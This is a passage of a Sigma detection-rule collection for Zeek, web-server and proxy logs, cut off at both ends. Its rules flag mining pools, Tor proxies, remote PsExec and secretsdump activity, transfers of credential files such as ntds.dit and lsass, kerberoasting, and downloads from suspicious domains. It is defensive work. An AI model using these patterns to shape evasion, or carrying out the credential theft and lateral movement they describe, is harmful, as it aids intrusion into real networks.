'baikalmine.com'\n            - 'tubepool.xyz'\n            - 'fairpool.xyz'\n            - 'asiapool.io'\n            - 'coinpoolit.webhop.me'\n            - 'nanopool.org'\n            - 'moneropool.com'\n            - 'miner.center'\n            - 'prohash.net'\n            - 'poolto.be'\n            - 'cryptoescrow.eu'\n            - 'monerominers.net'\n            - 'cryptonotepool.org'\n            - 'extrmepool.org'\n            - 'webcoin.me'\n            - 'kippo.eu'\n            - 'hashinvest.ws'\n            - 'monero.farm'\n            - 'linux-repository-updates.com'\n            - '1gh.com'\n            - 'dwarfpool.com'\n            - 'hash-to-coins.com'\n            - 'pool-proxy.com'\n            - 'hashfor.cash'\n            - 'fairpool.cloud'\n            - 'litecoinpool.org'\n            - 'mineshaft.ml'\n            - 'abcxyz.stream'\n            - 'moneropool.ru'\n            - 'cryptonotepool.org.uk'\n            - 'extremepool.org'\n            - 'extremehash.com'\n            - 'hashinvest.net'\n            - 'unipool.pro'\n            - 'crypto-pools.org'\n            - 'monero.net'\n            - 'backup-pool.com'\n            - 'mooo.com' # Dynamic DNS, may want to exclude\n            - 'freeyy.me'\n            - 'cryptonight.net'\n            - 'shscrypto.net'\n    exclude_answers:\n        answers:\n            - '127.0.0.1'\n            - '0.0.0.0'\n    exclude_rejected:\n        rejected: 'true'\n    condition: selection and not 1 of exclude_*\nfalsepositives:\n    - A DNS lookup does not necessarily mean a successful attempt. Verify a) if there was a response using the Zeek answers field, and if there was, verify the connections (conn.log) to those IPs; b) if there was HTTP, SSL, or TLS activity to the domain that was queried. The http.log field is 'host' and the ssl/tls field is 'server_name'.\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_nkn.yml",
    "content": "title: New Kind of Network (NKN) Detection\nid: fa7703d6-0ee8-4949-889c-48c84bc15b6f\nstatus: test\ndescription: NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>\nreferences:\n    - https://github.com/nknorg/nkn-sdk-go\n    - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/\n    - https://github.com/Maka8ka/NGLite\nauthor: Michael Portera (@mportatoes)\ndate: 2022-04-21\ntags:\n    - attack.command-and-control\nlogsource:\n    product: zeek\n    service: dns\ndetection:\n    selection:\n        query|contains|all:\n            - 'seed'\n            - '.nkn.org'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_susp_zbit_flag.yml",
    "content": "title: Suspicious DNS Z Flag Bit Set\nid: ede05abc-2c9e-4624-9944-9ff17fdc0bf5\nstatus: test\ndescription: |\n    The DNS Z flag is a bit within the DNS protocol header that is, per the IETF design, meant to be reserved (unused).\n    Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\n    Otherwise, if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\n    Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\n    This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs\nreferences:\n    - https://twitter.com/neu5ron/status/1346245602502443009\n    - https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma\n    - https://tools.ietf.org/html/rfc2929#section-2.1\n    - https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS\nauthor: '@neu5ron, SOC Prime Team, Corelight'\ndate: 2021-05-04\nmodified: 2022-11-29\ntags:\n    - attack.t1095\n    - attack.t1571\n    - attack.command-and-control\nlogsource:\n    product: zeek\n    service: dns\ndetection:\n    z_flag_unset:\n        Z: 0\n    most_probable_valid_domain:\n        query|contains: '.'\n    exclude_tlds:\n        query|endswith:\n            - '.arpa'\n            - '.local'\n            - '.ultradns.net'\n            - '.twtrdns.net'\n            - '.azuredns-prd.info'\n            - '.azure-dns.com'\n            - '.azuredns-ff.info'\n            - '.azuredns-ff.org'\n            - '.azuregov-dns.org'\n    exclude_query_types:\n        qtype_name:\n            - 'ns'\n            - 'mx'\n    exclude_responses:\n        answers|endswith: '\\\\x00'\n    exclude_netbios:\n        id.resp_p:\n            - 137\n            - 138\n            - 139\n    condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios)\nfalsepositives:\n    - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.'\n    - 'If you work in the Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"'\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_dns_torproxy.yml",
    "content": "title: DNS TOR Proxies\nid: a8322756-015c-42e7-afb1-436e85ed3ff5\nrelated:\n    - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544\n      type: similar\n    - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2\n      type: similar\nstatus: test\ndescription: Identifies IPs performing DNS lookups associated with common Tor proxies.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml\nauthor: Saw Winn Naung, Azure-Sentinel\ndate: 2021-08-15\nmodified: 2025-09-12\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    service: dns\n    product: zeek\ndetection:\n    selection:\n        query|endswith:\n            - '.hiddenservice.net'\n            - '.onion.ca'\n            - '.onion.cab'\n            - '.onion.casa'\n            - '.onion.city'\n            - '.onion.direct'\n            - '.onion.dog'\n            - '.onion.glass'\n            - '.onion.gq'\n            - '.onion.guide'\n            - '.onion.in.net'\n            - '.onion.ink'\n            - '.onion.it'\n            - '.onion.link'\n            - '.onion.lt'\n            - '.onion.lu'\n            - '.onion.ly'\n            - '.onion.mn'\n            - '.onion.network'\n            - '.onion.nu'\n            - '.onion.pet'\n            - '.onion.plus'\n            - '.onion.pt'\n            - '.onion.pw'\n            - '.onion.rip'\n            - '.onion.sh'\n            - '.onion.si'\n            - '.onion.to'\n            - '.onion.top'\n            - '.onion.ws'\n            - '.onion'\n            - '.s1.tor-gateways.de'\n            - '.s2.tor-gateways.de'\n            - '.s3.tor-gateways.de'\n            - '.s4.tor-gateways.de'\n            - '.s5.tor-gateways.de'\n            - '.t2w.pw'\n            - '.tor2web.ae.org'\n            - '.tor2web.blutmagie.de'\n            - '.tor2web.com'\n            - '.tor2web.fi'\n            - '.tor2web.io'\n            - '.tor2web.org'\n            - '.tor2web.xyz'\n            - '.torlink.co'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_http_executable_download_from_webdav.yml",
    "content": "title: Executable from Webdav\nid: aac2fd97-bcba-491b-ad66-a6edf89c71bf\nstatus: test\ndescription: 'Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/'\nreferences:\n    - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html\n    - https://github.com/OTRF/detection-hackathon-apt29\nauthor: 'SOC Prime, Adam Swan'\ndate: 2020-05-01\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection_webdav:\n        - c-useragent|contains: 'WebDAV'\n        - c-uri|contains: 'webdav'\n    selection_executable:\n        - resp_mime_types|contains: 'dosexec'\n        - c-uri|endswith: '.exe'\n    condition: selection_webdav and selection_executable\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_http_susp_file_ext_from_susp_tld.yml",
    "content": "title: HTTP Request to Low Reputation TLD or Suspicious File Extension\nid: 68c2c604-92ad-468b-bf4a-aac49adad08c\nstatus: experimental\ndescription: |\n    Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.\nreferences:\n    - https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows\n    - https://www.spamhaus.org/reputation-statistics/cctlds/domains/\nauthor: '@signalblur, Corelight'\ndate: 2025-02-26\ntags:\n    - attack.initial-access\n    - attack.command-and-control\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    # Suspicious TLD in the 'host' field OR malicious file extension in the 'uri' field.\n    selection_suspicious_tld:\n        host|endswith:\n            - '.bid'\n            - '.by'\n            - '.cf'\n            - '.click'\n            - '.cm'\n            - '.ga'\n            - '.gq'\n            - '.ir'\n            - '.kp'\n            - '.loan'\n            - '.ml'\n            - '.mm'\n            - '.party'\n            - '.pw'\n            - '.ru'\n            - '.su'\n            - '.sy'\n            - '.tk'\n            - '.top'\n            - '.tv'\n            - '.ve'\n            - '.work'\n            - '.xyz'\n    selection_malicious_ext:\n        uri|endswith:\n            - '.bat'\n            - '.bin'\n            - '.cmd'\n            - '.cpl'\n            - '.dll'\n            - '.dylib'\n            - '.elf'\n            - '.exe'\n            - '.hta'\n            - '.iso'\n            - '.jar'\n            - '.js'\n            - '.lnk'\n            - '.msi'\n            - '.pif'\n            - '.ps1'\n            - '.py'\n            - '.reg'\n            - '.scr'\n            - '.sh'\n            - '.so'\n            - '.vbs'\n            - '.wsf'\n    selection_malicious_mime:\n        resp_mime_types:\n            - 'application/vnd.microsoft.portable-executable'\n            - 'application/x-bat'\n            - 'application/x-dosexec'\n            - 'application/x-elf'\n            - 'application/x-iso9660-image'\n            - 'application/x-java-archive'\n            - 'application/x-ms-shortcut'\n            - 'application/x-msdos-program'\n            - 'application/x-msdownload'\n            - 'application/x-python-code'\n            - 'application/x-sh'\n    condition: selection_suspicious_tld and 1 of selection_malicious_*\nfalsepositives:\n    - Rare legitimate software downloads from low quality TLDs\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_http_webdav_put_request.yml",
    "content": "title: WebDav Put Request\nid: 705072a5-bb6f-4ced-95b6-ecfa6602090b\nstatus: test\ndescription: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/17\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2024-03-13\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection:\n        user_agent|contains: 'WebDAV'\n        method: 'PUT'\n    filter:\n        id.resp_h|cidr:\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_rdp_public_listener.yml",
    "content": "title: Publicly Accessible RDP Service\nid: 1fc0809e-06bf-4de3-ad52-25e5263b7623\nstatus: test\ndescription: |\n    Detects connections from routable IPs to an RDP listener, which is indicative of a publicly-accessible RDP service.\nauthor: Josh Brower @DefensiveDepth\ndate: 2020-08-22\nmodified: 2024-03-13\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    product: zeek\n    service: rdp\ndetection:\n    selection:\n        id.orig_h|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '2620:83:8000::/48'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    # approved_rdp:\n      # dst_ip:\n        # - x.x.x.x\n    condition: not selection # and not approved_rdp\nfalsepositives:\n    - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml",
    "content": "title: Remote Task Creation via ATSVC Named Pipe - Zeek\nid: dde85b37-40cd-4a94-b00c-0b8794f956b5\nrelated:\n    - id: f6de6525-4509-495a-8a82-1f8b0ed73a00\n      type: derived\nstatus: test\ndescription: Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe\nreferences:\n    - https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nauthor: 'Samir Bousseaden, @neu5rn'\ndate: 2020-04-03\nmodified: 2022-12-27\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.lateral-movement\n    - attack.persistence\n    - car.2013-05-004\n    - car.2015-04-001\n    - attack.t1053.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path: '\\\\\\*\\IPC$'\n        name: 'atsvc'\n        # Accesses: '*WriteData*'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml",
    "content": "title: Possible Impacket SecretDump Remote Activity - Zeek\nid: 92dae1ed-1c9d-4eff-a567-33acbd95b00e\nstatus: test\ndescription: 'Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml'\nreferences:\n    - https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nauthor: 'Samir Bousseaden, @neu5ron'\ndate: 2020-03-19\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.003\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path|contains|all:\n            - '\\'\n            - 'ADMIN$'\n        name|contains: 'SYSTEM32\\'\n        name|endswith: '.tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml",
    "content": "title: First Time Seen Remote Named Pipe - Zeek\nid: 021310d9-30a6-480a-84b7-eaa69aeb92bb\nrelated:\n    - id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad\n      type: derived\nstatus: test\ndescription: This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote execution using named pipes\nreferences:\n    - https://twitter.com/menasec1/status/1104489274387451904\nauthor: Samir Bousseaden, @neu5ron, Tim Shelton\ndate: 2020-04-02\nmodified: 2022-12-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path: '\\\\\\\\\\*\\\\IPC$' # Looking for the string \\\\*\\IPC$\n    filter_keywords:\n        - 'samr'\n        - 'lsarpc'\n        - 'winreg'\n        - 'netlogon'\n        - 'srvsvc'\n        - 'protected_storage'\n        - 'wkssvc'\n        - 'browser'\n        - 'netdfs'\n        - 'svcctl'\n        - 'spoolss'\n        - 'ntsvcs'\n        - 'LSM_API_service'\n        - 'HydraLsPipe'\n        - 'TermSrv_API_service'\n        - 'MsFteWds'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Update the excluded named pipe to filter out any newly observed legit named pipe\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml",
    "content": "title: Suspicious PsExec Execution - Zeek\nid: f1b3a22a-45e6-4004-afb5-4291f9c21166\nrelated:\n    - id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82\n      type: derived\nstatus: test\ndescription: Detects execution of psexec or paexec with a renamed service name. This rule helps to filter out the noise if psexec is used for legit purposes or if an attacker uses a different psexec client other than the sysinternal one\nreferences:\n    - https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nauthor: Samir Bousseaden, @neu5ron, Tim Shelton\ndate: 2020-04-02\nmodified: 2022-12-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path|contains|all:\n            - '\\\\'\n            - '\\IPC$'\n        name|endswith:\n            - '-stdin'\n            - '-stdout'\n            - '-stderr'\n    filter:\n        name|startswith: 'PSEXESVC'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml",
    "content": "title: Suspicious Access to Sensitive File Extensions - Zeek\nid: 286b47ed-f6fe-40b3-b3a8-35129acd43bc\nrelated:\n    - id: 91c945bc-2ad1-4799-a591-4d00198a1215\n      type: derived\nstatus: test\ndescription: Detects known sensitive file extensions via Zeek\nreferences:\n    - Internal Research\nauthor: Samir Bousseaden, @neu5ron\ndate: 2020-04-02\nmodified: 2025-10-17\ntags:\n    - attack.collection\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        name|endswith:\n            - '.pst'\n            - '.ost'\n            - '.msg'\n            - '.nst'\n            - '.oab'\n            - '.edb'\n            - '.nsf'\n            - '.bak'\n            - '.dmp'\n            - '.kirbi'\n            # - '\\groups.xml'  # Commented out: groups.xml is accessed legitimately by Group Policy processing; high FP rate in enterprise environments\n            - '.rdp'\n    condition: selection\nfalsepositives:\n    - Help Desk operator doing backup or re-imaging end user machine or backup software\n    - Users working with these data types or exchanging message files\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml",
    "content": "title: Transferring Files with Credential Data via Network Shares - Zeek\nid: 2e69f167-47b5-4ae7-a390-47764529eff5\nrelated:\n    - id: 910ab938-668b-401b-b08c-b596e80fdca5\n      type: similar\nstatus: test\ndescription: Transferring files with well-known filenames (sensitive files with credential data) using network shares\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: '@neu5ron, Teymur Kheirkhabarov, oscd.community'\ndate: 2020-04-02\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.001\n    - attack.t1003.003\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        name:\n            - '\\mimidrv'\n            - '\\lsass'\n            - '\\windows\\minidump\\'\n            - '\\hiberfil'\n            - '\\sqldmpr'\n            - '\\sam'\n            - '\\ntds.dit'\n            - '\\security'\n    condition: selection\nfalsepositives:\n    - Transferring sensitive files for legitimate administration work by legitimate administrator\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_susp_kerberos_rc4.yml",
    "content": "title: Kerberos Network Traffic RC4 Ticket Encryption\nid: 503fe26e-b5f2-4944-a126-eab405cc06e5\nstatus: test\ndescription: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting\nreferences:\n    - https://adsecurity.org/?p=3458\nauthor: sigma\ndate: 2020-02-12\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: zeek\n    service: kerberos\ndetection:\n    selection:\n        request_type: 'TGS'\n        cipher: 'rc4-hmac'\n    computer_acct:\n        service|startswith: '$'\n    condition: selection and not computer_acct\nfalsepositives:\n    - Normal enterprise SPN requests activity\nlevel: medium\n"
  },
  {
    "path": "rules/web/product/apache/web_apache_segfault.yml",
    "content": "title: Apache Segmentation Fault\nid: 1da8ce0b-855d-4004-8860-7d64d42063b1\nstatus: test\ndescription: Detects a segmentation fault error message caused by a crashing apache worker process\nreferences:\n    - http://www.securityfocus.com/infocus/1633\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-28\nmodified: 2021-11-27\ntags:\n    - attack.impact\n    - attack.t1499.004\nlogsource:\n    service: apache\n    definition: 'Requirements: Must be able to collect the error.log file'\ndetection:\n    keywords:\n        - 'exit signal Segmentation Fault'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/product/apache/web_apache_threading_error.yml",
    "content": "title: Apache Threading Error\nid: e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c\nstatus: test\ndescription: Detects an issue in apache logs that reports threading related errors\nreferences:\n    - https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-22\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.t1190\n    - attack.t1210\nlogsource:\n    service: apache\n    definition: 'Requirements: Must be able to collect the error.log file'\ndetection:\n    keywords:\n        - '__pthread_tpp_change_priority: Assertion `new_prio == -1 || (new_prio >= fifo_min_prio && new_prio <= fifo_max_prio)'\n    condition: keywords\nfalsepositives:\n    - 3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185\nlevel: medium\n"
  },
  {
    "path": "rules/web/product/nginx/web_nginx_core_dump.yml",
    "content": "title: Nginx Core Dump\nid: 59ec40bb-322e-40ab-808d-84fa690d7e56\nstatus: test\ndescription: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.\nreferences:\n    - https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps\n    - https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-31\nmodified: 2023-05-08\ntags:\n    - attack.impact\n    - attack.t1499.004\nlogsource:\n    service: nginx\ndetection:\n    keywords:\n        - 'exited on signal 6 (core dumped)'\n    condition: keywords\nfalsepositives:\n    - Serious issues with a configuration or plugin\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_download_susp_dyndns.yml",
    "content": "title: Download from Suspicious Dyndns Hosts\nid: 195c1119-ef07-4909-bb12-e66f5e07bf3c\nstatus: test\ndescription: Detects download of certain file types from hosts with dynamic DNS names (selected list)\nreferences:\n    - https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-08\nmodified: 2023-05-18\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\n    - attack.t1568\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri-extension:\n            - 'exe'\n            - 'vbs'\n            - 'bat'\n            - 'rar'\n            - 'ps1'\n            - 'doc'\n            - 'docm'\n            - 'xls'\n            - 'xlsm'\n            - 'pptm'\n            - 'rtf'\n            - 'hta'\n            - 'dll'\n            - 'ws'\n            - 'wsf'\n            - 'sct'\n            - 'zip'\n            # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/\n        cs-host|endswith:\n            - '.hopto.org'\n            - '.no-ip.org'\n            - '.no-ip.info'\n            - '.no-ip.biz'\n            - '.no-ip.com'\n            - '.noip.com'\n            - '.ddns.name'\n            - '.myftp.org'\n            - '.myftp.biz'\n            - '.serveblog.net'\n            - '.servebeer.com'\n            - '.servemp3.com'\n            - '.serveftp.com'\n            - '.servequake.com'\n            - '.servehalflife.com'\n            - '.servehttp.com'\n            - '.servegame.com'\n            - '.servepics.com'\n            - '.myvnc.com'\n            - '.ignorelist.com'\n            - '.jkub.com'\n            - '.dlinkddns.com'\n            - '.jumpingcrab.com'\n            - '.ddns.info'\n            - '.mooo.com'\n            - '.dns-dns.com'\n            - '.strangled.net'\n            - '.adultdns.net'\n            - '.craftx.biz'\n            - '.ddns01.com'\n            - '.dns53.biz'\n            - '.dnsapi.info'\n            - '.dnsd.info'\n            - '.dnsdynamic.com'\n            - '.dnsdynamic.net'\n            - '.dnsget.org'\n            - '.fe100.net'\n            - '.flashserv.net'\n            - '.ftp21.net'\n            - '.http01.com'\n            - '.http80.info'\n            - '.https443.com'\n            - '.imap01.com'\n            - '.kadm5.com'\n            - '.mysq1.net'\n            - '.ns360.info'\n            - '.ntdll.net'\n            - '.ole32.com'\n            - '.proxy8080.com'\n            - '.sql01.com'\n            - '.ssh01.com'\n            - '.ssh22.net'\n            - '.tempors.com'\n            - '.tftpd.net'\n            - '.ttl60.com'\n            - '.ttl60.org'\n            - '.user32.com'\n            - '.voip01.com'\n            - '.wow64.net'\n            - '.x64.me'\n            - '.xns01.com'\n            - '.dyndns.org'\n            - '.dyndns.info'\n            - '.dyndns.tv'\n            - '.dyndns-at-home.com'\n            - '.dnsomatic.com'\n            - '.zapto.org'\n            - '.webhop.net'\n            - '.25u.com'\n            - '.slyip.net'\n    condition: selection\nfalsepositives:\n    - Software downloads\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml",
    "content": "title: Download From Suspicious TLD - Blacklist\nid: 00d0b5ab-1f55-4120-8e83-487c0a7baf19\nrelated:\n    - id: b5de2919-b74a-4805-91a7-5049accbaefe\n      type: similar\nstatus: test\ndescription: Detects download of certain file types from hosts in suspicious TLDs\nreferences:\n    - https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap\n    - https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf\n    - https://www.spamhaus.org/statistics/tlds/\n    - https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-07\nmodified: 2023-05-18\ntags:\n    - attack.initial-access\n    - attack.t1566\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri-extension:\n            - 'exe'\n            - 'vbs'\n            - 'bat'\n            - 'rar'\n            - 'ps1'\n            - 'doc'\n            - 'docm'\n            - 'xls'\n            - 'xlsm'\n            - 'pptm'\n            - 'rtf'\n            - 'hta'\n            - 'dll'\n            - 'ws'\n            - 'wsf'\n            - 'sct'\n            - 'zip'\n            # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/\n        cs-host|endswith:\n            # Symantec / Chris Larsen analysis\n            - '.country'\n            - '.stream'\n            - '.gdn'\n            - '.mom'\n            - '.xin'\n            - '.kim'\n            - '.men'\n            - '.loan'\n            - '.download'\n            - '.racing'\n            - '.online'\n            - '.science'\n            - '.ren'\n            - '.gb'\n            - '.win'\n            - '.top'\n            - '.review'\n            - '.vip'\n            - '.party'\n            - '.tech'\n            - '.xyz'\n            - '.date'\n            - '.faith'\n            - '.zip'\n            - '.cricket'\n            - '.space'\n            # McAfee report\n            - '.info'\n            - '.vn'\n            - '.cm'\n            - '.am'\n            - '.cc'\n            - '.asia'\n            - '.ws'\n            - '.tk'\n            - '.biz'\n            - '.su'\n            - '.st'\n            - '.ro'\n            - '.ge'\n            - '.ms'\n            - '.pk'\n            - '.nu'\n            - '.me'\n            - '.ph'\n            - '.to'\n            - '.tt'\n            - '.name'\n            - '.tv'\n            - '.kz'\n            - '.tc'\n            - '.mobi'\n            # Spamhaus\n            - '.study'\n            - '.click'\n            - '.link'\n            - '.trade'\n            - '.accountant'\n            # Spamhaus 2018 https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/\n            - '.cf'\n            - '.gq'\n            - '.ml'\n            - '.ga'\n            # Custom\n            - '.pw'\n    condition: selection\nfalsepositives:\n    - All kinds of software downloads\nlevel: low\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml",
    "content": "title: Download From Suspicious TLD - Whitelist\nid: b5de2919-b74a-4805-91a7-5049accbaefe\nrelated:\n    - id: 00d0b5ab-1f55-4120-8e83-487c0a7baf19\n      type: similar\nstatus: test\ndescription: Detects executable downloads from suspicious remote systems\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-13\nmodified: 2023-05-18\ntags:\n    - attack.initial-access\n    - attack.t1566\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri-extension:\n            - 'exe'\n            - 'vbs'\n            - 'bat'\n            - 'rar'\n            - 'ps1'\n            - 'doc'\n            - 'docm'\n            - 'xls'\n            - 'xlsm'\n            - 'pptm'\n            - 'rtf'\n            - 'hta'\n            - 'dll'\n            - 'ws'\n            - 'wsf'\n            - 'sct'\n            - 'zip'\n            # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/\n    filter:\n        cs-host|endswith:\n            - '.com'\n            - '.org'\n            - '.net'\n            - '.edu'\n            - '.gov'\n            - '.uk'\n            - '.ca'\n            - '.de'\n            - '.jp'\n            - '.fr'\n            - '.au'\n            - '.us'\n            - '.ch'\n            - '.it'\n            - '.nl'\n            - '.se'\n            - '.no'\n            - '.es'\n            # Extend this list as needed\n    condition: selection and not filter\nfalsepositives:\n    - All kind of software downloads\nlevel: low\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_downloadcradle_webdav.yml",
